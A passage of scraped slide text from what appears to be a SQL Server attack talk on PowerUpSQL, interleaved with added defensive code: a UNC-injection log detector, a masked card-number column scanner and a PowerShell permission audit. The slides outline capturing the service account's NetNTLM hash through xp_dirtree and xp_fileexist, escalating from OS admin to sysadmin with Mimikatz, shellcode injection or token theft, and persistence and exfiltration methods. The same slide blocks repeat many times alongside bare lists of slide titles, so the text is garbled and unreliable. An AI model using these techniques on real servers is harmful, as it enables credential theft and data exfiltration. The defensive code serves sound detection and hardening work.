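    time, login, is_sysadmin, stmt = line.rstrip("\n").split("\t", 3)
    return {"time": time, "login": login, "sysadmin": is_sysadmin == "1", "stmt": stmt}


def detect_unc_injection(lines, sanctioned=SANCTIONED_FILE_SERVERS):
    """Flag file-path procedure calls that point the service account at an
    unsanctioned host. Calls from non-sysadmin logins are rated high because
    they match the PUBLIC-role abuse the slides describe."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        rec = parse_line(line)
        m = PROC_RE.search(rec["stmt"])
        if not m:
            continue
        host = unc_host(m.group("path"))
        if host is None or host in sanctioned:
            continue  # local path, or a file server the account legitimately uses
        findings.append({
            "time": rec["time"],
            "login": rec["login"],
            "proc": m.group("proc").lower(),
            "host": host,
            "severity": "high" if not rec["sysadmin"] else "medium",
        })
    return findings


def hosts_by_login(findings):
    """Destinations per login; one login steering the account to odd hosts is the capture/relay pattern."""
    out = {}
    for f in findings:
        out.setdefault(f["login"], set()).add(f["host"])
    return out


if __name__ == "__main__":
    for f in detect_unc_injection(SAMPLE_LOG):
        print(f"{f['time']} {f['severity']:6} {f['login']} {f['proc']} -> \\\\{f['host']}")
```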
Escalating Privileges: OS Admin to SysAdmin
Two things to know…
1. Different SQL Server versions can be abused in different ways
2. All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges: OS Admin to SysAdmin
Approach            | 2000 | 2005 | 2008 | 2012 | 2014 | 2016
LSA Secrets         |  x   |  x   |  x   |  x   |  x   |  x
Local Administrator |  x   |  x   |      |      |      |
LocalSystem         |  x   |  x   |  x   |      |      |
Process Migration   |  x   |  x   |  x   |  x   |  x   |  x
Token Stealing      |  x   |  x   |  x   |  x   |  x   |  x
Single User Mode    |      |  x   |  x   |  x   |  x   |  x
Below are some options for leveraging that knowledge.
Escalating Privileges: OS Admin to SysAdmin
Here are some tool options:
Approach | Common Tools
Access as Local Administrator | Management Studio, sqlcmd, and other native SQL client tools
Access as LocalSystem | Psexec, accessibility options, debugger, with native SQL client tools
Recover SQL Server service account password from LSA Secrets | Mimikatz, Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process | Metasploit, Empire, Python, PowerShell, C, C++ (LoadLibrary, CreateRemoteThread, and similar functions)
Steal authentication token from the SQL Server service process | Metasploit Incognito, Invoke-TokenManipulation
Single User Mode | DBATools
Post Exploitation Overview
Common Post Exploitation Activities
1. Establish Persistence
   - SQL Server layer: startup procedures, agent jobs, triggers, modified code
   - OS layer: registry & file auto runs, tasks, services, etc.
2. Identify Sensitive Data
   - Target large databases
   - Locate transparently encrypted databases
   - Search columns based on keywords and sample data
   - Use regular expressions and the Luhn formula against data samples
3. Exfiltrate Sensitive Data
   - All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
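For step 2 (identify sensitive data), an added example, not PowerUpSQL code, that applies the column keyword, regular expression and Luhn formula checks to sampled rows; the rows, column names and keyword list are constructed, and the card values are public test numbers.

```python
"""Column classifier for sensitive-data discovery: column-name keywords plus a
card number regex validated with the Luhn formula, applied to sampled rows.

Added example, not PowerUpSQL code. Rows are constructed; in practice they
would be a TOP-N sample from each table of interest.
"""
import re

COLUMN_KEYWORDS = ("card", "ccn", "pan", "credit")  # column-name hints (constructed list)
# 13-19 digits, optionally separated by spaces or dashes, not embedded in a longer digit run.
CARD_RE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")

SAMPLE_ROWS = [  # constructed sample; card values are public test numbers
    {"customer_id": "1001", "card_number": "4111111111111111",
     "notes": "call back re order 4111 1111 1111 1111", "order_total": "19.99"},
    {"customer_id": "1002", "card_number": "5500 0000 0000 0004",
     "notes": "invoice 20160930 paid", "order_total": "240.00"},
    {"customer_id": "1003", "card_number": "3400-0000-0000-009",
     "notes": "", "order_total": "7.50"},
    {"customer_id": "1004", "card_number": "4111111111111112",  # fails Luhn
     "notes": "ref 1234567890123", "order_total": "88.10"},     # 13 digits, fails Luhn
]


def luhn_valid(digits):
    """Luhn check: double every second digit from the right, subtract 9 if > 9,
    the total must be a multiple of 10."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def card_candidates(text):
    """Luhn-valid card numbers found in one value (separators stripped)."""
    found = []
    for m in CARD_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group(0))
        if luhn_valid(digits):
            found.append(digits)
    return found


def mask(digits):
    """Keep only the last four digits in any report output."""
    return "*" * (len(digits) - 4) + digits[-4:]


def score_columns(rows):
    """Per column: keyword match, rows holding a Luhn-valid number, hit ratio
    and masked examples. A column is reported on either signal, so a stray
    card number in a free-text column is not lost behind a low ratio."""
    findings = {}
    for col in rows[0]:
        values = [str(r.get(col, "")) for r in rows]
        hits = [c for v in values for c in card_candidates(v)]
        keyword = any(k in col.lower() for k in COLUMN_KEYWORDS)
        if hits or keyword:
            rows_hit = sum(1 for v in values if card_candidates(v))
            findings[col] = {
                "keyword_match": keyword,
                "rows_with_hits": rows_hit,
                "hit_ratio": rows_hit / len(values),
                "examples": [mask(c) for c in hits[:3]],
            }
    return findings


if __name__ == "__main__":
    for col, info in score_columns(SAMPLE_ROWS).items():
        print(col, info)
```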
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
Escalating Privileges: OS Admin to SysAdmin
Two things to know...
1 Different SQL Server versions can be abused in different ways
2 All SQL Server versions provide the service account with sysadmin privileges

Approach              2000  2005  2008  2012  2014  2016
LSA Secrets           x     x     x     x     x     x
Local Administrator   x     x
LocalSystem           x     x     x
Process Migration     x     x     x     x     x     x
Token Stealing        x     x     x     x     x     x
Single User Mode      x     x     x     x     x

Below are some options for leveraging that knowledge. Here are some tool options (Approach: Common Tools):
• Access as Local Administrator: Management Studio, sqlcmd, and other native SQL client tools
• Access as LocalSystem: PsExec, accessibility options, debugger, with native SQL client tools
• Recover SQL Server service account password from LSA Secrets: Mimikatz, Metasploit lsadump
• Inject shellcode or DLL into the SQL Server service process: Metasploit, Empire, Python, PowerShell, C, C++ (LoadLibrary/CreateRemoteThread and similar functions)
• Steal authentication token from SQL Server service process: Metasploit Incognito, Invoke-TokenManipulation
• Single User Mode: DBATools
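An added PowerShell check, not from the deck or from PowerUpSQL, that audits both escalation surfaces above on one instance: whether PUBLIC still holds EXECUTE on xp_dirtree and xp_fileexist (the UNC path injection surface), and whether BUILTIN\Administrators or NT AUTHORITY\SYSTEM are members of sysadmin (the Local Administrator and LocalSystem rows of the version table). It assumes Windows PowerShell with System.Data.SqlClient, a placeholder instance name, and a login that can read server role membership (sysadmin, or VIEW ANY DEFINITION).

```powershell
# Added example (not from the deck or PowerUpSQL). Reports the two default conditions
# the slides rely on and, with -Remediate, revokes the PUBLIC grants on the file-path procs.
function Get-SqlEscalationSurface {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $Instance,   # placeholder, e.g. 'SQLSERVER01\PROD'
        [switch] $Remediate                           # revoke EXECUTE on the two procs from public
    )

    # 1) Does the public role hold EXECUTE on the file-path extended procedures in master?
    #    class = 1 restricts sys.database_permissions to object-level grants.
    $procQuery = @"
SELECT o.name AS proc_name, pr.name AS grantee, dp.state_desc
FROM   master.sys.database_permissions dp
JOIN   master.sys.all_objects         o  ON o.object_id = dp.major_id AND dp.class = 1
JOIN   master.sys.database_principals pr ON pr.principal_id = dp.grantee_principal_id
WHERE  o.name IN ('xp_dirtree', 'xp_fileexist')
  AND  pr.name = 'public'
  AND  dp.permission_name = 'EXECUTE'
  AND  dp.state_desc LIKE 'GRANT%';
"@

    # 2) Which principals are in sysadmin? Windows built-ins there are what turn an OS admin
    #    (or anything running as LocalSystem) into a sysadmin with nothing but a SQL client.
    $roleQuery = @"
SELECT m.name AS member_name, m.type_desc
FROM   sys.server_role_members rm
JOIN   sys.server_principals r ON r.principal_id = rm.role_principal_id
JOIN   sys.server_principals m ON m.principal_id = rm.member_principal_id
WHERE  r.name = 'sysadmin';
"@

    $conn = New-Object System.Data.SqlClient.SqlConnection
    # Windows authentication; adjust the encryption settings to match your environment.
    $conn.ConnectionString = "Server=$Instance;Integrated Security=SSPI;Encrypt=True;TrustServerCertificate=False"
    $conn.Open()
    try {
        $findings = @()
        $cmd = $conn.CreateCommand()

        $cmd.CommandText = $procQuery
        $reader = $cmd.ExecuteReader()
        while ($reader.Read()) {
            $findings += [pscustomobject]@{
                Instance = $Instance
                Check    = 'PublicExecOnFilePathProc'
                Detail   = "$($reader['proc_name']) is executable by public ($($reader['state_desc']))"
            }
        }
        $reader.Close()

        $cmd.CommandText = $roleQuery
        $reader = $cmd.ExecuteReader()
        while ($reader.Read()) {
            $name = [string]$reader['member_name']
            if ($name -in @('BUILTIN\Administrators', 'NT AUTHORITY\SYSTEM')) {
                $findings += [pscustomobject]@{
                    Instance = $Instance
                    Check    = 'OsPrincipalIsSysadmin'
                    Detail   = "$name is a member of sysadmin ($($reader['type_desc']))"
                }
            }
        }
        $reader.Close()

        if ($Remediate) {
            # Unqualified names resolve to the system objects in master.
            $cmd.CommandText = 'USE master; REVOKE EXECUTE ON xp_dirtree FROM public; REVOKE EXECUTE ON xp_fileexist FROM public;'
            [void]$cmd.ExecuteNonQuery()
        }
        return $findings
    }
    finally { $conn.Close() }
}

# Usage with a placeholder instance name:
# Get-SqlEscalationSurface -Instance 'SQLSERVER01\PROD' | Format-Table -AutoSize
```

Test the revoke before rolling it out, since some management tooling (the file browser dialogs in Management Studio, for one) calls these procedures on behalf of non-sysadmin users. Pair the check with egress filtering and alerting on outbound SMB from SQL Server hosts, because that outbound connection is the trace a UNC path injection leaves.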
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
Escalating Privileges Database Links
DEMO
>
Escalating Privileges Crawling Server Links
EscalatingPrivileges
UNC Path Injection
Escalating Privileges UNC Path Injection
UNC Path Injection Summary
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
Escalating Privileges Crawling Server Links
EscalatingPrivileges
UNC Path Injection
Escalating Privileges UNC Path Injection
UNC Path Injection Summary
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
